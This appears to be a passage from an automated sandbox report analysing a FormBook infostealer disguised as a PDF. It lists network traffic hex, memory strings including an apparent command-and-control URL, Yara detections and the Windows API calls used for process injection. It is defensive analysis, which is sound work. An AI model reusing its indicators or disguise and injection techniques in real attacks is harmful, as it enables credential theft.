3d fb e6 e4 9b cf fd ef e4 9b 7f 7c d5 e9 20 1d 9d 99 ef 77 f8 33 c7 9d 9b 57 2b 77 be b1 4d ff 0c 6e 0d 6c d7 98 9b de 19 61 1f ff 9b 7f 7e 3e b3 5d c7 9c ff 15 0a bc 37 83 81 c6 6f 7c f3 42 bc 3c c9 55 5d 83 10 a4 aa fb de 2c 06 91 2f 0a ff e2 72 73 cb 0f ce 66 bf f9 b4 d8 b5 b9 3a bb b6 dd d9 07 9f 8f 04 f0 ec 1a 84 ef 26 fa e2 b1 6e 07 e9 00 2a fe f1 dc cc 6c fd 77 f6 15 4f e9 7a 00 3e ac 6d e3 7e b2 b0 cd 8f 53 fc 18 cc 2d cf 9c 05 96 eb 4c 66 ae bd 59 39 53 32 0c 26 a2 20 7c 3d 5d 59 0e 1d 15 13 59 12 d6 1f a7 4b d3 ba 59 06 f4 d9 da 98 cf 61 34 4e d4 e1 fa 63 47 e8 08 d3 95 e1 dd 58 ce 44 98 02 1c d7 9b fc 8b ac 29 f0 ff 74 01 43 65 22 4a 50 e8 47 18 33 1e f7 ad 07 a3 8b fb c1 b4 6f cd c0 9a 19 9d 9f cc 8d 99 fc e4 be f7 4c f3 bd e1 f8 9c 0f 1f 03 18 fc d6 62 7a 6d cc 3e dc 78 ee c6 99 4f fe 65 b1 58 4c 07 77 e6 f5 07 2b 18 04 c6 7a b0 84 16 d9 d8 aa 01 45 1b 78 50 6f 6d 78 30 3a b7 a8 75 26 8e 1b f4 f8 94 a6 e9 77 22 5e b8 a0 57 16 b6 7b 37 f8 38 59 5a f3 b9 e9 6c ff 40 86 61 a7 97 d0 2d 0a 92 b2 fe d8 7f 48 43 a8 01 b0 0d 1f 5d a1 ee bb 82 66 7c 00 16 3d 20 b8 84 75 b7 cb 6c 29 d3 f3 5c 8f 02 8c 78 2a ec 68 fa d5 ca 74 36 03 2c 8c 1d 07 cf e7 e6 9c 6b 5e 65 60 cc b0 4c 84 76 10 b8 6b 40 dd 8c 09 65 70 73 00 b7 0d 9b 20 a2 ac 1d a0 19 e5 e4 ed 92 8a 4c e9 d4 08 18 8f 35 68 d5 0e 26 c3 13 6b 71 3f b8 f6 dc 3b 10 dd ab 5b cb b7 ae ed 2c 4c 55 69 4c dc 8e 36 95 f2 83 b5 25 49 e7 b8 d7 96 6d 0e 22 99 be a2 12 cd 45 8f fd cd 35 b2 f8 ca 5d 9b a0 a5 63 d1 8f 04 7f 07 5f ae 16 ae 0b 83 7f 30 77 ef 9c 9d 82 5a de 90 1d b5 aa da 17 12 de 54 9c 76 81 6b 2c 9e a5 44 95 c0 e5 ad a4 db 23 65 4d a6 aa 6d 19 2f 1f 50 85 4f 44 d0 bf c6 26 70 a7 f9 5e 49 01 cb 56 cb 6a a4 af 9b 52 93 81 55 42 43
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 12:58:47 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 66 65 62 31 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 22 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 64 61 74 61 2d 70 61 6e 65 6c 2d 75 72 6c 3d 22 68 74 74 70 73 3a 2f 2f 73 65 72 76 65 72 31 31 38 2e 68 6f 73 74 69 6e 67 2e 72 65 67 2e 72 75 2f 6d 61 6e 61 67 65 72 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 26 6e 62 73 70 3b d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 2f 2a 21 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 21 2a 5c 0a 20 20 21 2a 2a 2a 20 63 73 73 20 2e 2f 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 2f 63 73 73 2d 6c 6f 61 64 65 72 2f 69 6e 64 65 78 2e 6a 73 3f 3f 63 6c 6f 6e 65 64 52 75 6c 65 53 65 74 2d 36 2e 75 73 65 5b 31 5d 21 2e 2f 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 2f 70 6f 73 74 63 73 73 2d 6c 6f 61 64 65 72 2f 73 72 63 2f 69 6e 64 65 78 2e 6a 73 21 2e 2f 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 2f 6c 65 73 73 2d 6c 6f 61 64 65 72 2f 64 69 73 74 2f 63 6a 73 2e 6a 73 21 2e 2f 62 65 6d 2f 62 6c 6f 63 6b 73 2e 61 64 61 70 74 69 76 65 2f 62 2d 70 61 67 65 2f 62 2d 70 61 67 65 2e 6c 65 73 73 20 2a 2a 2a 21 0a 20 20 5c 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2f 0a 2e 62 2d 70 61 67 65 7b 64 69 73 70 6c 61 79 3a
                    Source: mountvol.exe, 00000006.00000002.3914892156.00000000043FE000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000381E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://assets.lolipop.jp/img/bnr/bnr_lolipop_ad_001.gif
                    Source: mountvol.exe, 00000006.00000002.3914892156.0000000004BD8000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.0000000003FF8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
                    Source: mountvol.exe, 00000006.00000002.3914892156.00000000043FE000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000381E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://js.ad-stir.com/js/adstir.js?20130527
                    Source: EnLuReulIds.exe, 00000007.00000002.3916754998.000000000511C000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.oztalkshw.store
                    Source: EnLuReulIds.exe, 00000007.00000002.3916754998.000000000511C000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.oztalkshw.store/3agz/
                    Source: mountvol.exe, 00000006.00000002.3914892156.0000000004D6A000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000418A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://2domains.ru
                    Source: mountvol.exe, 00000006.00000002.3917477328.0000000007BB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: mountvol.exe, 00000006.00000002.3917477328.0000000007BB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: mountvol.exe, 00000006.00000002.3917477328.0000000007BB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: mountvol.exe, 00000006.00000002.3917477328.0000000007BB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: mountvol.exe, 00000006.00000002.3917477328.0000000007BB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: mountvol.exe, 00000006.00000002.3917477328.0000000007BB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: mountvol.exe, 00000006.00000002.3917477328.0000000007BB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: mountvol.exe, 00000006.00000002.3914892156.0000000004D6A000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000418A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://files.reg.ru/fonts/inter/Inter-Medium.woff)
                    Source: mountvol.exe, 00000006.00000002.3914892156.0000000004D6A000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000418A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://files.reg.ru/fonts/inter/Inter-Medium.woff2)
                    Source: mountvol.exe, 00000006.00000002.3914892156.0000000004D6A000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000418A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://files.reg.ru/fonts/inter/Inter-Regular.woff)
                    Source: mountvol.exe, 00000006.00000002.3914892156.0000000004D6A000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000418A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://files.reg.ru/fonts/inter/Inter-Regular.woff2)
                    Source: mountvol.exe, 00000006.00000002.3914892156.0000000004D6A000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000418A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://files.reg.ru/fonts/inter/Inter-SemiBold.woff)
                    Source: mountvol.exe, 00000006.00000002.3914892156.0000000004D6A000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000418A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://files.reg.ru/fonts/inter/Inter-SemiBold.woff2)
                    Source: mountvol.exe, 00000006.00000002.3917281058.0000000006010000.00000004.00000800.00020000.00000000.sdmp, mountvol.exe, 00000006.00000002.3914892156.0000000004A46000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.0000000003E66000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://kb.fastpanel.direct/troubleshoot/
                    Source: mountvol.exe, 00000006.00000002.3902989488.0000000002BCE000.00000004.00000020.00020000.00000000.sdmp, mountvol.exe, 00000006.00000002.3902989488.0000000002B9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                    Source: mountvol.exe, 00000006.00000002.3902989488.0000000002BCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                    Source: mountvol.exe, 00000006.00000003.1955738952.0000000007AE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                    Source: mountvol.exe, 00000006.00000002.3902989488.0000000002B9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                    Source: mountvol.exe, 00000006.00000002.3902989488.0000000002B9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                    Source: mountvol.exe, 00000006.00000002.3902989488.0000000002B9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                    Source: mountvol.exe, 00000006.00000002.3902989488.0000000002B9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                    Source: mountvol.exe, 00000006.00000002.3914892156.00000000043FE000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000381E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lolipop.jp/
                    Source: mountvol.exe, 00000006.00000002.3914892156.00000000043FE000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000381E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://minne.com/?utm_source=lolipop&utm_medium=banner&utm_campaign=synergy&utm_content=404
                    Source: mountvol.exe, 00000006.00000002.3914892156.00000000043FE000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000381E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://pepabo.com/
                    Source: mountvol.exe, 00000006.00000002.3914892156.0000000004D6A000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000418A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://reg.ru?target=_blank
                    Source: EnLuReulIds.exe, 00000007.00000002.3914220418.000000000418A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://server118.hosting.reg.ru/manager
                    Source: mountvol.exe, 00000006.00000002.3914892156.00000000043FE000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000381E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.minne.com/files/banner/minne_600x500
                    Source: mountvol.exe, 00000006.00000002.3914892156.00000000043FE000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000381E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://support.lolipop.jp/hc/ja/articles/360049132953
                    Source: mountvol.exe, 00000006.00000002.3917477328.0000000007BB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: mountvol.exe, 00000006.00000002.3914892156.0000000004EFC000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000431C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                    Source: mountvol.exe, 00000006.00000002.3914892156.0000000004D6A000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000418A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/dedicated/?utm_source=&utm_medium=expired&utm_campaign
                    Source: mountvol.exe, 00000006.00000002.3914892156.0000000004D6A000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000418A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting/?utm_source=&utm_medium=expired&utm_campaign
                    Source: mountvol.exe, 00000006.00000002.3914892156.0000000004D6A000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000418A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/ssl-certificate/?utm_source=&utm_medium=expired&utm_campaign
                    Source: mountvol.exe, 00000006.00000002.3914892156.0000000004D6A000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000418A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/support/#request
                    Source: mountvol.exe, 00000006.00000002.3914892156.0000000004D6A000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000418A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/support/hosting-i-servery/moy-sayt-ne-rabotaet/oshibka-404
                    Source: mountvol.exe, 00000006.00000002.3914892156.0000000004D6A000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000418A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/vps/?utm_source=&utm_medium=expired&utm_campaign
                    Source: mountvol.exe, 00000006.00000002.3914892156.0000000004D6A000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000418A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/vps/cloud/?utm_source=&utm_medium=expired&utm_campaign
                    Source: mountvol.exe, 00000006.00000002.3914892156.0000000004D6A000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000418A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-tools/geoip?utm_source=&utm_medium=expired&utm_campaign
                    Source: mountvol.exe, 00000006.00000002.3914892156.0000000004D6A000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000418A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-tools/myip?utm_source=&utm_medium=expired&utm_campaign
                    Source: mountvol.exe, 00000006.00000002.3914892156.0000000004D6A000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000418A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-tools/port-checker?utm_source=&utm_medium=expired&utm_campaign
                    Source: mountvol.exe, 00000006.00000002.3914892156.0000000004D6A000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000418A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/?utm_source=&utm_medium=expired&utm_campaign
                    Source: mountvol.exe, 00000006.00000002.3914892156.0000000004D6A000.00000004.10000000.00040000.00000000.sdmp, EnLuReulIds.exe, 00000007.00000002.3914220418.000000000418A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/check_site?utm_source=&utm_medium=expired&utm_campaign

                    E-Banking Fraud

                    barindex
                    Yara detected FormBook
                    Source: Yara matchFile source: 00000003.00000002.1767827302.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.3913848871.0000000003010000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1770238639.0000000001400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.3902764512.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.3916754998.0000000005090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.3913780105.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1772985722.0000000001D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.3913539434.0000000003190000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                    System Summary

                    barindex
                    Initial sample is a PE file and has a suspicious name
                    Source: initial sampleStatic PE information: Filename: DO-COSU6387686280.pdf.exe
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2B60 NtClose,LdrInitializeThunk,3_2_017D2B60
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_017D2DF0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_017D2C70
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D35C0 NtCreateMutant,LdrInitializeThunk,3_2_017D35C0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D4340 NtSetContextThread,3_2_017D4340
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D4650 NtSuspendThread,3_2_017D4650
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2BF0 NtAllocateVirtualMemory,3_2_017D2BF0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2BE0 NtQueryValueKey,3_2_017D2BE0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2BA0 NtEnumerateValueKey,3_2_017D2BA0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2B80 NtQueryInformationFile,3_2_017D2B80
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2AF0 NtWriteFile,3_2_017D2AF0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2AD0 NtReadFile,3_2_017D2AD0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2AB0 NtWaitForSingleObject,3_2_017D2AB0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2D30 NtUnmapViewOfSection,3_2_017D2D30
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2D10 NtMapViewOfSection,3_2_017D2D10
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2D00 NtSetInformationFile,3_2_017D2D00
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2DD0 NtDelayExecution,3_2_017D2DD0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2DB0 NtEnumerateKey,3_2_017D2DB0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2C60 NtCreateKey,3_2_017D2C60
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2C00 NtQueryInformationProcess,3_2_017D2C00
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2CF0 NtOpenProcess,3_2_017D2CF0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2CC0 NtQueryVirtualMemory,3_2_017D2CC0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2CA0 NtQueryInformationToken,3_2_017D2CA0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2F60 NtCreateProcessEx,3_2_017D2F60
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2F30 NtCreateSection,3_2_017D2F30
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2FE0 NtCreateFile,3_2_017D2FE0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2FB0 NtResumeThread,3_2_017D2FB0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2FA0 NtQuerySection,3_2_017D2FA0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2F90 NtProtectVirtualMemory,3_2_017D2F90
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2E30 NtWriteVirtualMemory,3_2_017D2E30
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2EE0 NtQueueApcThread,3_2_017D2EE0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2EA0 NtAdjustPrivilegesToken,3_2_017D2EA0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2E80 NtReadVirtualMemory,3_2_017D2E80
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D3010 NtOpenDirectoryObject,3_2_017D3010
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D3090 NtSetValueKey,3_2_017D3090
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D39B0 NtGetContextThread,3_2_017D39B0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D3D70 NtOpenThread,3_2_017D3D70
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D3D10 NtOpenProcessToken,3_2_017D3D10
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0042CA43 NtClose,3_2_0042CA43
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03124340 NtSetContextThread,LdrInitializeThunk,6_2_03124340
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03124650 NtSuspendThread,LdrInitializeThunk,6_2_03124650
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03122B60 NtClose,LdrInitializeThunk,6_2_03122B60
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03122BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_03122BA0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03122BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_03122BF0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03122BE0 NtQueryValueKey,LdrInitializeThunk,6_2_03122BE0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03122AD0 NtReadFile,LdrInitializeThunk,6_2_03122AD0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03122AF0 NtWriteFile,LdrInitializeThunk,6_2_03122AF0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03122F30 NtCreateSection,LdrInitializeThunk,6_2_03122F30
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03122FB0 NtResumeThread,LdrInitializeThunk,6_2_03122FB0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03122FE0 NtCreateFile,LdrInitializeThunk,6_2_03122FE0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03122E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_03122E80
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03122EE0 NtQueueApcThread,LdrInitializeThunk,6_2_03122EE0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03122D10 NtMapViewOfSection,LdrInitializeThunk,6_2_03122D10
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03122D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_03122D30
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03122DD0 NtDelayExecution,LdrInitializeThunk,6_2_03122DD0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_03122DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_03122DF0
